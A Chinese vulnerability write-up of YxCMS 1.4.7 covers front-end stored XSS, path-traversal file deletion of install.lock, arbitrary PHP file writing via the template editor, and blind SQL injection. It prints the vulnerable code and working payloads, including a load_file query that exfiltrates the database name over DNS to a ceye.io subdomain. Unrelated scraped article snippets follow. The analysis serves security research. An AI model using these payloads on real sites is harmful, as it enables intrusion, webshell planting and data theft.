dfdhxb995397

YxCMS 1.4.7 最新版漏洞分析

i春秋作家：F0rmat

原文来自：YxCMS 1.4.7 最新版漏洞分析

0x01前言

很感谢关注我专辑的表哥，我会坚持写下去的，最近会慢一点，一月四篇是正常的。

在先知看到的，大部分都是后台漏洞，部分厂商对于后台的漏洞都不认可，因为厂商觉得能进入后台这些漏洞都不是漏洞。最恐怖的是厂商否认了漏洞存在，然后偷偷的去修复。

0x02 安装程序

具体的安装和使用的详细可以上官网查看https://www.kancloud.cn/yongheng/yxcms

0x03 前台XSS

1.漏洞复现

打开链接http://sb.com/index.php?r=default/column/index&col=guestbook
输入payload：
然后登陆后台，查看审核

点击编辑
2.漏洞分析

前台的文件源码protected/apps/default/controller/columnController.php

public function index()
{
    $ename=in($_GET['col']);
    if(empty($ename)) throw new Exception('栏目名不能为空~', 404);
    $sortinfo=model('sort')->find("ename='{$ename}'",'id,name,ename,path,url,type,deep,method,tplist,keywords,description,extendid');
    $path=$sortinfo['path'].','.$sortinfo['id'];
    $deep=$sortinfo['deep']+1;
    $this->col=$ename;
    switch ($sortinfo['type']) {
        case 1://文章
            $this->newslist($sortinfo,$path,$deep);
            break;
        case 2://图集
            $this->photolist($sortinfo,$path,$deep);
            break;
        case 3://单页
            $this->page($sortinfo,$path,$deep);
            break;
        case 4://应用

            break;
        case 5://自定义

            break;
        case 6://表单
            $this->extend($sortinfo,$path,$deep);
            break;
        default:
            throw new Exception('未知的栏目类型~', 404);
            break;
    }
}

后台的文件源码protected/apps/admin/controller/extendfieldController.php

public function mesedit()
{
    $tableid=intval($_GET['tabid']);
    if(!$this->checkConPower('extend',$tableid)) $this->error('您没有权限管理此独立表内容~');
    $id=intval($_GET['id']);//信息id
    if(empty($tableid) || empty($id) ) $this->error('参数错误~');
    $tableinfo = model('extend')->select("id='{$tableid}' OR pid='{$tableid}'",'id,tableinfo,name,type,defvalue','pid,norder DESC');
    if(empty($tableinfo)) $this->error('自定义表不存在~');
    if (!$this->isPost()) {
       $info=model('extend')->Extfind($tableinfo[0]['tableinfo'],"id='{$id}'");
       $this->info=$info;
       $this->tableid=$tableid;
       $this->id=$id;
       $this->tableinfo=$tableinfo;
       $this->display();
    }else{
       for($i=1;$iExtup($tableinfo[0]['tableinfo'],"id='{$id}'",$data)) $this->success('修改成功~',url('extendfield/meslist',array('id'=>$tableid)));
       else $this->error('信息修改失败~');
     }
}

中间没什么过滤，具体可以看松哥的一篇文章：https://www.hackersb.cn/hacker/85.html

0x04 任意文件删除

1.漏洞复现

需要先登录后台，然后访问之后会显示缩略图不存在：
Payload：http://sb.com/index.php?r=admin/photo/delpic
POST：picname=../../protected/apps/install/install.lock
然后访问网站首页就会自动转到安装的页面http://sb.com/index.php
看到目录下的install.lock文件已经被删除了
2.漏洞分析

漏洞文件：protected/apps/admin/controller/photoController.php,在第355行的delpic()函数，可以看到$picname接收POST过来的值，然后$path等于文件开头定义的静态变量
static protected $uploadpath='';//图片上传路径
没有对传入的值进行任何的过滤，使用函数file_exists()判断一下文件是否存在就给unlink执行删除文件了。

public function delpic()
{
    if(empty($_POST['picname'])) $this->error('参数错误~');
    $picname=$_POST['picname'];
    $path=$this->uploadpath;
    if(file_exists($path.$picname))
      @unlink($path.$picname);
    else{echo '图片不存在~';return;} 
    if(file_exists($path.'thumb_'.$picname))
       @unlink($path.'thumb_'.$picname);
    else {echo '缩略图不存在~';return;}
    echo '原图以及缩略图删除成功~';
}

0x05 任意文件写入

1.漏洞复现

打开地址http://sb.com/index.php?r=admin/set/tpadd&Mname=default
打开我们的文件监控软件FolderChangesView，输入我们的程序路径D:\phpStudy\PHPTutorial\WWW\YXcms
然后写shell.php文件名，写入我们的代码。
然后会在\protected\apps\default\view\default下面生成我们写入的文件。
2.漏洞分析
漏洞文件protected/apps/admin/controller/setController.php的140行，$tpfile接收到GET传过来的值，如果为空的话就会报非法操作。传过来的URL是admin/set/tpadd&Mname=default，所以$tpfile就是default。
再来下是检测是否有POST的值，接受到POST过来的filename,用trim去掉两边的空格。接收到POST过来的code，用stripcslashes反转义。
$filepath=$templepath.$filename.'.php'这一句是路径和文件的拼接，然后下面检测路径是否存在。

最后没有过滤任何的危险函数就传给file_put_contents函数，写入网站的目录。

public function tpadd()
{
   $tpfile=$_GET['Mname'];
   if(empty($tpfile)) $this->error('非法操作~');
   $templepath=BASE_PATH . $this->tpath.$tpfile.'/';
   if($this->isPost()){
     $filename=trim($_POST['filename']);
     $code=stripcslashes($_POST['code']);
     if(empty($filename)||empty($code)) $this->error('文件名和内容不能为空');
     $filepath=$templepath.$filename.'.php';
     if($this->ifillegal($filepath)) {$this->error('非法的文件路径~');exit;}
     try{
        file_put_contents($filepath, $code);
      } catch(Exception $e) {
        $this->error('模板文件创建失败！');
      } 
      $this->success('模板文件创建成功！',url('set/tplist',array('Mname'=>$tpfile)));
   }else{
     $this->tpfile=$tpfile;
     $this->display();

   }
}

0x06 SQL注入

1.漏洞复现

这个盲注可以用ceye.io和python脚本跑，我之前的文章也有写到。
http://sb.com/index.php?r=admin/fragment/index
payload:1 and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))),1,1))--

点击删除

然后用burp截获数据，修改内容加上我们的payload，用原文的payload后面+会报错

然后进入http://ceye.io/records/dns 查看我们的数据
2.漏洞分析

查看漏洞文件protected/apps/admin/controller/fragmentController.php的第63行

public function del()
{
    if(!$this->isPost()){
        $id=intval($_GET['id']);
        if(empty($id)) $this->error('您没有选择~');
        if(model('fragment')->delete("id='$id'"))
        echo 1;
        else echo '删除失败~';
    }else{
        if(empty($_POST['delid'])) $this->error('您没有选择~');
        $delid=implode(',',$_POST['delid']);
        if(model('fragment')->delete('id in ('.$delid.')'))
        $this->success('删除成功',url('fragment/index'));
    }
}

我们跟if(model('fragment')->delete("id='$id'")),它会先到protected/core.php文件里面的model

function model($model){
static $objArray = array();
$className = $model . 'Model';
if( !is_object($objArray[$className]) ){
    if( !class_exists($className) ) {
        throw new Exception(config('_APP_NAME'). '/' . $className . '.php 模型类不存在');
    }
    $objArray[$className] = new $className();
}
return $objArray[$className];
}

然后到protected/apps/admin/model/fragmentModel.php

 
      继续protected/base/model/baseModel.php 
        
        prefix=config('DB_PREFIX');
}
} 
         
       
  
      再来到最底层的数据库操作类protected/base/model/model.php的第45行 
        
        public function delete($condition){
return $this->model->table($this->table, $this->ignoreTablePrefix)->where($condition)->delete();
} 
         
       
 这个delete()是从哪里来的，我们来看第十三行的代码,创建了一个对象cpModel 
        
        static public function connect($config, $force=false){
    static $model = NULL;
    if( $force==true || empty($model) ){
        $model = new cpModel($config);
    }
    return $model;
} 
         
       
  
       漏洞文件在protected/include/core/cpModel.class.php, 
        
        public function delete() {
    $table = $this->options['table'];    //当前表
    $where = $this->_parseCondition();   //条件
    if ( empty($where) ) return false; //删除条件为空时，则返回false，避免数据不小心被全部删除

    $this->sql = "DELETE FROM $table $where";
    $query = $this->db->execute($this->sql);
    return $this->db->affectedRows();
} 
         
       
 这里用到了一个方法_parseCondition() 
        
        private function _parseCondition() {
    $condition = $this->db->parseCondition($this->options);
    $this->options['where'] = '';
    $this->options['group'] = '';
    $this->options['having'] = '';
    $this->options['order'] = '';
    $this->options['limit'] = '';
    $this->options['field'] = '*';       
    return $condition;      
}
} 
         
       
 这个函数是在protected/include/core/db/cpMysql.class.php的128行 
        
        public function parseCondition($options) {
    $condition = "";
    if(!empty($options['where'])) {
        $condition = " WHERE ";
        if(is_string($options['where'])) {
            $condition .= $options['where'];
        } else if(is_array($options['where'])) {
                foreach($options['where'] as $key => $value) {
                     $condition .= " `$key` = " . $this->escape($value) . " AND ";
                }
                $condition = substr($condition, 0,-4);  
        } else {
            $condition = "";
        }
    }

    if( !empty($options['group']) && is_string($options['group']) ) {
        $condition .= " GROUP BY " . $options['group'];
    }
    if( !empty($options['having']) && is_string($options['having']) ) {
        $condition .= " HAVING " .  $options['having'];
    }
    if( !empty($options['order']) && is_string($options['order']) ) {
        $condition .= " ORDER BY " .  $options['order'];
    }
    if( !empty($options['limit']) && (is_string($options['limit']) || is_numeric($options['limit'])) ) {
        $condition .= " LIMIT " .  $options['limit'];
    }
    if( empty($condition) ) return "";
    return $condition;
} 
         
       
 里面有一个行数来过滤escape,我们找到74行的这个函数定义 
        
        public function escape($value) {
    if( isset($this->_readLink) ) {
        $link = $this->_readLink;
    } elseif( isset($this->_writeLink) ) {
        $link = $this->_writeLink;
    } else {
        $link = $this->_getReadLink();
    }

    if( is_array($value) ) { 
       return array_map(array($this, 'escape'), $value);
    } else {
       if( get_magic_quotes_gpc() ) {
           $value = stripslashes($value);
       } 
        return  "'" . mysql_real_escape_string($value, $link) . "'";
    }
} 
         
       
 不过这个函数有一句is_array如果是数组才会执行下面的过滤，如果不是的话就正常执行下去,没有任何sql的过滤就造成了注入漏洞。
 0x07 参考
 程序下载：https://www.lanzous.com/i1w4bsb
https://xz.aliyun.com/t/2734
https://bbs.ichunqiu.com/thread-22002-1-1.html
http://ceye.io
  
       大家有任何问题可以提问，更多文章可到i春秋论坛阅读哟~

 
  转载于:https://www.cnblogs.com/ichunqiu/p/9669136.html


    
        你可能感兴趣的:(php,python,数据库)
        
            
                
                    《Python与C#：虚拟机与元宇宙的次元战争》
                        虫洞没有虫
科技资讯\好文分享c#开发语言
                        一、运行时拓扑的「克莱因瓶」C#的CLR是三维环面结构的完美体现，IL代码在JIT编译时经历时空折叠。Unity引擎中，值类型在栈内存构建莫比乌斯环，使得800万顶点模型渲染保持16ms的帧同步。但当尝试将ECS架构推至理论极限时，发现GC的标记-清除算法会破坏拓扑结构，必须切换到UnityDOTS的Burst编译器实现量子退火优化。Python的PyPy则是四维超球面，JIT编译器在跟踪热点时创
                    
                    社交媒体文章内容与评论抓取：Python 爬虫实战教程
                        Python爬虫项目
2025年爬虫实战项目媒体python爬虫
                        社交媒体平台是全球信息交流的重要渠道，成千上万的文章、评论和动态每天都在各大平台上发布。这些数据包含了丰富的用户行为、意见和情感分析的潜力，因此抓取社交媒体平台上的文章内容与评论已成为数据分析、市场研究和情感分析等领域的重要任务。本篇教程将为大家详细介绍如何使用Python编写爬虫，抓取社交媒体平台（如微博、Twitter、Facebook等）的文章内容和评论。我们将涵盖如何使用现代爬虫技术，包括
                    
                    【项目实战】Miniforge安装和管理python
                        本本本添哥
Pythonpython
                        Miniforge是一个轻量级的Conda安装器，它提供了一种快速、独立的方法来安装和管理Python的科学计算环境。Miniforge由社区维护，并专注于兼容ARM架构的设备（如AppleM1/M2/M3芯片）和其他CPU架构。与Anaconda和Miniconda相比，Miniforge提供了几个显著的优势，包括更小的安装包、更快的安装速度、较少的磁盘占用以及使用conda-forge作为默认
                    
                    C# ASP.NET的应用场景
                        来恩1003
C#从入门到精通c#asp.net数据库
                        .NET学习资料.NET学习资料.NET学习资料C#ASP.NET作为一种强大的Web开发框架，在众多领域都有着广泛的应用，为各类Web应用的开发提供了高效、可靠的解决方案。以下是其主要的应用场景：企业级Web应用在企业级应用开发中，C#ASP.NET凭借其卓越的性能和强大的功能，成为众多企业的首选。它能够与企业现有的系统和数据库进行无缝集成，例如与MicrosoftSQLServer数据库紧密结
                    
                    Python说课内容介绍
                        laocooon523857886
算法算法
                        一、明确课程目标1.课程目标的确定面向整个专业：Python课程作为计算机专业或相关专业中的一部分，需要对学生的编程能力、问题解决能力以及软件开发的基础技能进行培养。通过本课程，学生能够掌握Python编程的基本语法、面向对象编程、常见数据结构和算法。面向岗位：课程目标还需要结合市场需求和岗位要求。例如，数据分析、人工智能、Web开发等方向都需要具备Python编程能力。学生通过学习Python，
                    
                    idea 配置并运行python
                        鬼龙寺
intellij-ideapythonjavaide开发语言
                        我整理的一些关于【CI】的项目学习资料（附讲解～～）和大家一起分享、学习一下：https://d.51cto.com/xltfov使用IntelliJIDEA配置并运行Python项目在当今的编程世界中，选择合适的集成开发环境（IDE）对提高开发效率至关重要。IntelliJIDEA是一款强大的IDE，它不仅支持Java，还通过插件扩展支持Python等其他编程语言。本篇文章将指导读者如何在Int
                    
                    python自动化框架pytest_全功能Python测试框架：pytest
                        weixin_39637646

                        python通用测试框架大多数人用的是unittest+HTMLTestRunner，这段时间看到了pytest文档，发现这个框架和丰富的plugins很好用，所以来学习下pytest.image.pngpytest是一个非常成熟的全功能的Python测试框架，主要有以下几个特点：简单灵活，容易上手支持参数化能够支持简单的单元测试和复杂的功能测试，还可以用来做selenium/appnium等自动
                    
                    print不起作用 pytest_全功能Python测试框架：pytest
                        吕欲知
print不起作用pytest
                        python通用测试框架大多数人用的是unittest+HTMLTestRunner，这段时间看到了pytest文档，发现这个框架和丰富的plugins很好用，所以来学习下pytest.pytest是一个非常成熟的全功能的Python测试框架，主要有以下几个特点：简单灵活，容易上手支持参数化能够支持简单的单元测试和复杂的功能测试，还可以用来做selenium/appnium等自动化测试、接口自动化
                    
                    Redis高级特性解析——Redis核心技术与最佳实践
                        AI天才研究院
Python实战DeepSeekR1&大数据AI人工智能大模型Java实战大数据人工智能语言模型JavaPython架构设计
                        作者：禅与计算机程序设计艺术1.简介Redis是开源的高性能键值对存储数据库，它支持数据持久化、LRU淘汰策略、发布订阅系统、事务、流水线等丰富的数据结构和功能，并且提供多种客户端编程接口，可以满足用户各种应用场景的需求。但是，作为一个高性能数据库，Redis还存在一些不足之处，比如内存管理、网络模型、集群架构、客户端连接、监控、持久化、主从复制等方面。因此，作者希望通过本文分析Redis高级特性
                    
                    Python自学知识清单(持续更新中...)
                        彩虹小黑馬
Pythonpython开发语言
                        Python自学知识清单第一章：数据结构Python自学-变量及对象Python自学-函数的使用Python自学-进制转换Python自学-字符串转义、查找及切片Python自学-字符串处理函数Python自学-字符串格式化输出详解Python自学-列表的用法Python自学-元组的用法Python自学-字典的用法Python自学-集合的用法Python自学-引用与拷贝第二章：语句Python自学
                    
                    python基础知识介绍
                        tqs_12345
python开发语言
                        Python基础知识主要包括以下几个方面：语法基础：Python采用简洁易懂的语法，使用缩进来表示代码块。它支持多种数据类型，如整数、浮点数、字符串、列表、元组、字典和集合等。变量和数据类型：在Python中，变量不需要事先声明类型，可以根据赋值自动推断类型。Python支持多种内置数据类型，并允许用户自定义数据类型。控制流语句：Python提供了条件语句（如if-elif-else）、循环语句（
                    
                    【MySQL】mysqldump使用方法
                        m0_74825152
面试学习路线阿里巴巴mysqloracle数据库
                        本文介绍MySQL数据库mysqldump常用方法。MySQL数据库mysqldump常用方法导出整个数据库（包括数据库中的数据）。mysqldump-uusername-pdbname>dbname.sql导出数据库结构（不含数据）。mysqldump-uusername-p-ddbname>dbname.sql导出数据库中的某张数据表（包含数据）。mysqldump-uusername-pdb
                    
                    Python测试框架：pytest 入门
                        互联网杂货铺
职场和发展python自动化测试测试工具软件测试pytest测试用例
                        点击文末小卡片，免费获取软件测试全套资料，资料在手，涨薪更快pytest是一个功能强大而易于使用的Python测试框架。它提供了简单的语法和灵活的功能，用于编写和组织测试代码。1、简单易用：pytest的语法简洁明了，使得编写测试用例更加直观和易于理解。它使用assert语句来验证预期结果，让测试代码更加简洁易读。2、自动发现测试：pytest能够自动发现并执行测试文件和测试函数。它遵循命名规则（
                    
                    【数据结构】排序算法---基数排序（动图演示）
                        Crossoads
C语言之数据结构初阶排序算法数据结构算法开发语言c语言
                        文章目录1.定义2.算法步骤2.1MSD基数排序2.2LSD基数排序3.LSD基数排序动图演示4.性质5.算法分析6.代码实现C语言PythonJavaC++Go结语⚠本节要介绍的不是计数排序1.定义基数排序（英语：Radixsort）是一种非比较型的排序算法，最早用于解决卡片排序的问题。基数排序将待排序的元素拆分为k个关键字，逐一对各个关键字排序后完成对所有元素的排序。如果是从第1关键字到第k关
                    
                    Python满屏飘字代码
                        Want595
趣味编程python开发语言
                        系列专栏《Python趣味编程》《C/C++趣味编程》《HTML趣味编程》《Java趣味编程》系列文章序号直达链接Tkinter1Python李峋同款可写字版跳动的爱心2Python跳动的双爱心3Python蓝色跳动的爱心4Python动漫烟花5Python粒子烟花Turtle1Python满屏飘字2Python蓝色流星雨3Python金色流星雨4Python漂浮爱心5Python爱心光波①6Py
                    
                    chattts本地化python部署及采坑记录(2024年亲测可用)
                        Catformon
python开发语言
                        ChatTTS是一个文本转语音的开源项目，短短2周左右的时间，在GitHub上已经斩获了24.4k的Star！官网：https://chattts.com/zh开源地址：https://github.com/2noise/ChatTTSChatTTS模型：https://huggingface.co/2Noise/ChatTTSChatTTS在线网页Demo：https://huggingface
                    
                    Python数据永生秘籍：从菜鸟到存储大师的5层通关攻略
                        李智 - 重庆
Python精讲精练-从入门到实战python案例学习经验分享考试通关错误分析
                        Python数据永生秘籍：从菜鸟到存储大师的5层通关攻略内容简介本系列文章是为Python3学习者精心设计的一套全面、实用的学习指南，旨在帮助读者从基础入门到项目实战，全面提升编程能力。文章结构由5个版块组成，内容层层递进，逻辑清晰。基础速通：n个浓缩提炼的核心知识点，夯实编程基础；经典范例：10个贴近实际的应用场景，深入理解Python3的编程技巧和应用方法；避坑宝典：10个典型错误解析，提供解
                    
                    阿里云RDS到亚马逊云RDS的实时数据同步方案详解
                        ivwdcwso
运维阿里云云计算awskda数据同步
                        1.需求背景在当今的多云环境中,企业经常需要在不同云平台之间同步数据。本文将详细介绍如何实现从阿里云RDSMySQL数据库到亚马逊云RDSMySQL数据库的实时数据同步。这种同步对于数据备份、跨区域数据访问、数据分析等场景都非常有用。2.方案概述我们将使用AWSKinesisDataAnalytics(KDA)作为核心组件来实现这个实时同步方案。KDA基于ApacheFlink,支持使用SQL或J
                    
                    全新语句match，python新版本终于要引入switch-case了？
                        「已注销」
python进阶python
                        match语句(python3.10)在很多语言中，有一种用于条件判断的switch-case语句，但是在python中一直以来，没有switch-case。不过在python3.10的新版本中，加入了match-case语句。match语句的基础使用方法与switch-case语句比较类似，是通过match和case之间的组合，完成结构化模式匹配。但是match语句不等同于switch-case
                    
                    实战探析：云数据库 RDS SQL Server 版的优点与应用案例
                        步入烟尘
python数据库oracle性能优化
                        实战探析：云数据库RDSSQLServer版的优点与应用案例背景：随着云计算技术的不断发展，越来越多的企业开始将数据库迁移到云端，以降低成本、提高可用性和灵活性。而在云数据库的选择上，AmazonRDS（RelationalDatabaseService）SQLServer版本成为了众多企业的首选之一。本文将深入探讨在实际应用中，利用云数据库RDSSQLServer版所带来的优点及其实战应用。云数
                    
                    python介绍&pycharm使用技巧
                        倩倩倩倩千千*-
python自动化测试pythonpycharm开发语言
                        一、python简单介绍python===>跨平台、面想对象，解释型（边运行边翻译）计算机程序设计语言被称为"胶水语言"ps：java是编译型语言学习编程要领（3+1）：编程语法编程规范编程技巧+带着工作任务多练、多实战，从小需求、小工具开始二、python优缺点优点：1、简单易学；2、免费开源；3、面向对象；4、丰富的库；5、可扩展性缺点：1、运行速度慢；2、好的中文资料匮乏三、python应用
                    
                    MongoDB入门与实践
                        风中凌乱的猿
笔记mongodb数据库
                        MongoDB是一个NoSQL数据库，它采用文档模型来存储数据，具有高性能、易扩展、灵活的特点。以下是MongoDB的入门指南和一些基本的实践示例，帮助你开始使用MongoDB。1.安装和基本配置安装MongoDB具体安装方法取决于你的操作系统。以Ubuntu为例，可以通过以下命令安装MongoDB：sudoaptupdatesudoaptinstall-ymongodb启动MongoDB安装完成
                    
                    《Python编程轻松进阶》干货整理
                        KLZZ66
python开发语言idejupyter
                        《Python编程轻松进阶》干货整理最近把《Python编程轻松进阶》看完了，看得过程中顺便整理了一些自己觉得比较重要的点，分享出来，共同进步！文章目录《Python编程轻松进阶》干货整理第一章处理错误和寻求帮助1.1如何查看模块版本第二章环境设置和命令行2.1使用pathlib库可以让Python脚本跨平台兼容2.2Path常用命令2.3命令行参数2.3.1/?2.3.2python-c2.3.
                    
                    Anaconda3 介绍和安装
                        gorgor在码农
#python入门基础pythonconda
                        介绍Anaconda是一个开源的Python和R语言发行版，专注于数据科学、机器学习和科学计算，主要面向数据科学和机器学习领域。它集成了大量常用的科学计算库（如NumPy、Pandas、Matplotlib、Scikit-learn等），并提供了强大的包管理工具Conda和环境管理功能，适合快速部署和管理复杂的开发环境。特点：预装丰富库：包含250+常用的数据科学工具包，无需手动安装。跨平台支持：
                    
                    【vLLM 学习】安装
                        

                        vLLM是一款专为大语言模型推理加速而设计的框架，实现了KV缓存内存几乎零浪费，解决了内存管理瓶颈问题。更多vLLM中文文档及教程可访问→https://vllm.hyper.ai/vLLM是一个Python库，包含预编译的C++和CUDA(12.1)二进制文件。依赖环境操作系统：LinuxPython：3.8-3.12GPU：计算能力7.0或更高（例如V100、T4、RTX20xx、A100、L
                    
                    Python 潮流周刊#89：Python 3.14 的新型解释器！（摘要）
                        
python
                        本周刊由Python猫出品，精心筛选国内外的250+信息源，为你挑选最值得分享的文章、教程、开源项目、软件工具、播客和视频、热门话题等内容。愿景：帮助所有读者精进Python技术，并增长职业和副业的收入。分享了12篇文章，12个开源项目，2则热门讨论以下是本期摘要：文章&教程①Python3.14新特性：一种新型解释器②高效扩展Python：PyO3与Rust实战③使用uv开发和安装PythonC
                    
                    沃德代驾系统uniapp+php
                        博纳软云
博纳miui52086全行业源码sony52101uni-app微信小程序小程序微信
                        代驾软件的主要功能包括预约代驾、在线抢单、一键定位、在线支付、车主登记和代驾司机实名登记等‌。用户可以通过小程序预约代驾服务，系统会估算代驾价格并推送附近代驾司机供用户选择；司机接到订单后，会自动生成路线，方便快速找到车主；服务结束后，用户可以直接在线支付。用户端代驾端更新日志V1.0.0发布版本
                    
                    python后端调用Deep Seek API
                        YY_oot
pythonai语言模型
                        python后端调用DeepSeekAPI需要依次下载●Ollama●DeepseekR1LLM模型●嵌入模型nomic-embed-text/bge-m3●AnythingLLM参考教程：DeepseekR1打造本地化RAG知识库:安装部署使用详细教程手把手教你：deepseekR1基于AnythingLLMAPI调用本地知识库python调用anythingllm的APIimportreque
                    
                    多python环境配置搞不定 看这篇就够了
                        Nothi.C
python环境python开发语言linuxwindows
                        环境配置一直都是难倒无数入门选手的关键问题。如何在一台电脑中运行多个版本？本文章以virtualenv构建虚拟环境为例子首先，下载相对应的Python，windows版本下载完成后如若遇到PYTHON和PIP已安装却系统无法执行：此电脑高级设置—>环境变量->系统PATH->新建->粘贴PYTHON路径（为指定Python）和PYTHON\Scripts（为指定pip）或者执行命令setPATH=
                    
                    下载多个python如何配置环境
                        彪悍的高校
python开发语言
                        多环境Python配置方案在数据科学和软件开发的领域，Python因其简单易用而广受欢迎。然而，随着项目的不断增多，我们常常需要在同一台机子上安装多个版本的Python及其依赖。为了解决这个问题，我们可以采用虚拟环境管理工具。本文将介绍如何通过venv和pyenv来配置多个Python环境，并提供相关的代码示例。一、环境准备在开始前，请确保你的计算机上已安装了以下软件：Python：确保安装了Py
                    
                                sql统计相同项个数并按名次显示
                                    朱辉辉33
javaoracle
                                    现在有如下这样一个表： 
A表 
ID Name time 
------------------------------ 
0001 aaa 2006-11-18 
0002 ccc 2006-11-18 
0003 eee 2006-11-18 
0004 aaa 2006-11-18 
0005 eee 2006-11-18 
0004 aaa 2006-11-18 
0002 ccc 20
                                
                                Android+Jquery Mobile学习系列-目录
                                    白糖_
JQuery Mobile
                                    最近在研究学习基于Android的移动应用开发，准备给家里人做一个应用程序用用。向公司手机移动团队咨询了下，觉得使用Android的WebView上手最快，因为WebView等于是一个内置浏览器，可以基于html页面开发，不用去学习Android自带的七七八八的控件。然后加上Jquery mobile的样式渲染和事件等，就能非常方便的做动态应用了。 
  
从现在起，往后一段时间，我打算
                                
                                如何给线程池命名
                                    daysinsun
线程池
                                            在系统运行后，在线程快照里总是看到线程池的名字为pool-xx，这样导致很不好定位，怎么给线程池一个有意义的名字呢。参照ThreadPoolExecutor类的ThreadFactory，自己实现ThreadFactory接口，重写newThread方法即可。参考代码如下： 
    
public class Named
                                
                                IE 中"HTML Parsing Error:Unable to modify the parent container element before the
                                    周凡杨
html解析errorreadyState
                                      
错误：  IE   中"HTML Parsing Error:Unable to modify the parent container element before the child element is closed"      
  
  
现象：  同事之间几个IE 测试情况下，有的报这个错，有的不报。经查询资料后，可归纳以下原因。
                                
                                java上传
                                    g21121
java
                                    我们在做web项目中通常会遇到上传文件的情况，用struts等框架的会直接用的自带的标签和组件，今天说的是利用servlet来完成上传。 
我们这里利用到commons-fileupload组件，相关jar包可以取apache官网下载：http://commons.apache.org/ 
下面是servlet的代码： 
//定义一个磁盘文件工厂
DiskFileItemFactory fact
                                
                                SpringMVC配置学习
                                    510888780
springmvc
                                    spring MVC配置详解 
现在主流的Web MVC框架除了Struts这个主力 外，其次就是Spring MVC了，因此这也是作为一名程序员需要掌握的主流框架，框架选择多了，应对多变的需求和业务时，可实行的方案自然就多了。不过要想灵活运用Spring MVC来应对大多数的Web开发，就必须要掌握它的配置及原理。 
 
　　一、Spring MVC环境搭建：（Spring 2.5.6 + Hi
                                
                                spring mvc-jfreeChart 柱图(1)
                                    布衣凌宇
jfreechart
                                    第一步：下载jfreeChart包，注意是jfreeChart文件lib目录下的，jcommon-1.0.23.jar和jfreechart-1.0.19.jar两个包即可； 
第二步：配置web.xml; 
web.xml代码如下 
<servlet> 
    <servlet-name>jfreechart</servlet-nam
                                
                                我的spring学习笔记13-容器扩展点之PropertyPlaceholderConfigurer
                                    aijuans
Spring3
                                    PropertyPlaceholderConfigurer是个bean工厂后置处理器的实现，也就是BeanFactoryPostProcessor接口的一个实现。关于BeanFactoryPostProcessor和BeanPostProcessor类似。我会在其他地方介绍。PropertyPlaceholderConfigurer可以将上下文（配置文件）中的属性值放在另一个单独的标准java P
                                
                                java 线程池使用 Runnable&Callable&Future
                                    antlove
javathreadRunnablecallablefuture
                                    1. 创建线程池 
ExecutorService executorService = Executors.newCachedThreadPool(); 
  
2. 执行一次线程，调用Runnable接口实现 
Future<?> future = executorService.submit(new DefaultRunnable());
System.out.prin
                                
                                XML语法元素结构的总结
                                    百合不是茶
xml树结构
                                    1.XML介绍1969年   gml (主要目的是要在不同的机器进行通信的数据规范)1985年   sgml  standard generralized markup language1993年   html(www网)1998年  xml   extensible markup language
                                
                                改变eclipse编码格式
                                    bijian1013
eclipse编码格式
                                    1.改变整个工作空间的编码格式 
        改变整个工作空间的编码格式，这样以后新建的文件也是新设置的编码格式。 
        Eclipse->window->preferences->General->workspace-
                                
                                javascript中return的设计缺陷
                                    bijian1013
JavaScriptAngularJS
                                    代码1： 
<script>
var gisService = (function(window) 
{ 

    return
    {
        name:function ()
        {
            alert(1);
        }
    };

})(this);

gisService.name();
&l
                                
                                【持久化框架MyBatis3八】Spring集成MyBatis3
                                    bit1129
Mybatis3
                                    pom.xml配置 
Maven的pom中主要包括： 
 
 MyBatis 
 MyBatis-Spring 
 Spring 
 MySQL-Connector-Java 
 Druid 
 applicationContext.xml配置     
<?xml version="1.0" encoding="UTF-8"?>
&
                                
                                java web项目启动时自动加载自定义properties文件
                                    bitray
javaWeb监听器相对路径
                                    创建一个类 
public class ContextInitListener implements ServletContextListener 
使得该类成为一个监听器。用于监听整个容器生命周期的，主要是初始化和销毁的。 
 
类创建后要在web.xml配置文件中增加一个简单的监听器配置，即刚才我们定义的类。 
 

    <listener>
        <des
                                
                                用nginx区分文件大小做出不同响应
                                    ronin47

                                    昨晚和前21v的同事聊天，说到我离职后一些技术上的更新。其中有个给某大客户(游戏下载类)的特殊需求设计，因为文件大小差距很大——估计是大版本和补丁的区别——又走的是同一个域名，而squid在响应比较大的文件时，尤其是初次下载的时候，性能比较差，所以拆成两组服务器，squid服务于较小的文件，通过pull方式从peer层获取，nginx服务于较大的文件，通过push方式由peer层分发同步。外部发布
                                
                                java-67-扑克牌的顺子.从扑克牌中随机抽5张牌，判断是不是一个顺子，即这5张牌是不是连续的.2-10为数字本身，A为1，J为11，Q为12，K为13，而大
                                    bylijinnan
java
                                    package com.ljn.base;

import java.util.Arrays;
import java.util.Random;

public class ContinuousPoker {

    /**
     * Q67 扑克牌的顺子 从扑克牌中随机抽5张牌，判断是不是一个顺子，即这5张牌是不是连续的。
     * 2-10为数字本身，A为1，J为1
                                
                                翟鸿燊老师语录
                                    ccii
翟鸿燊
                                    一、国学应用智慧TAT之亮剑精神A 
1. 角色就是人格 
    就像你一回家的时候，你一进屋里面，你已经是儿子，是姑娘啦，给老爸老妈倒怀水吧，你还觉得你是老总呢？还拿派呢？就像今天一样，你们往这儿一坐，你们之间是什么，同学，是朋友。 
    还有下属最忌讳的就是领导向他询问情况的时候，什么我不知道，我不清楚，该你知道的你凭什么不知道
                                
                                [光速与宇宙]进行光速飞行的一些问题
                                    comsci
问题
                                     
 
     在人类整体进入宇宙时代，即将开展深空宇宙探索之前，我有几个猜想想告诉大家 
    仅仅是猜想。。。未经官方证实 
 
 
     1：要在宇宙中进行光速飞行，必须首先获得宇宙中的航行通行证，而这个航行通行证并不是我们平常认为的那种带钢印的证书，是什么呢？ 下面我来告诉
                                
                                oracle undo解析
                                    cwqcwqmax9
oracle
                                    oracle undo解析2012-09-24 09:02:01     我来说两句       作者：虫师收藏    我要投稿 
 
Undo是干嘛用的？         &nb
                                
                                java中各种集合的详细介绍
                                    dashuaifu
java集合
                                    一，java中各种集合的关系图 Collection       接口的接口     对象的集合  ├ List           子接口   &n
                                
                                卸载windows服务的方法
                                    dcj3sjt126com
windowsservice
                                    卸载Windows服务的方法 
在Windows中，有一类程序称为服务，在操作系统内核加载完成后就开始加载。这里程序往往运行在操作系统的底层，因此资源占用比较大、执行效率比较高，比较有代表性的就是杀毒软件。但是一旦因为特殊原因不能正确卸载这些程序了，其加载在Windows内的服务就不容易删除了。即便是删除注册表中的相 应项目，虽然不启动了，但是系统中仍然存在此项服务，只是没有加载而已。如果安装其他
                                
                                Warning: The Copy Bundle Resources build phase contains this target's Info.plist
                                    dcj3sjt126com
iosxcode
                                           
      
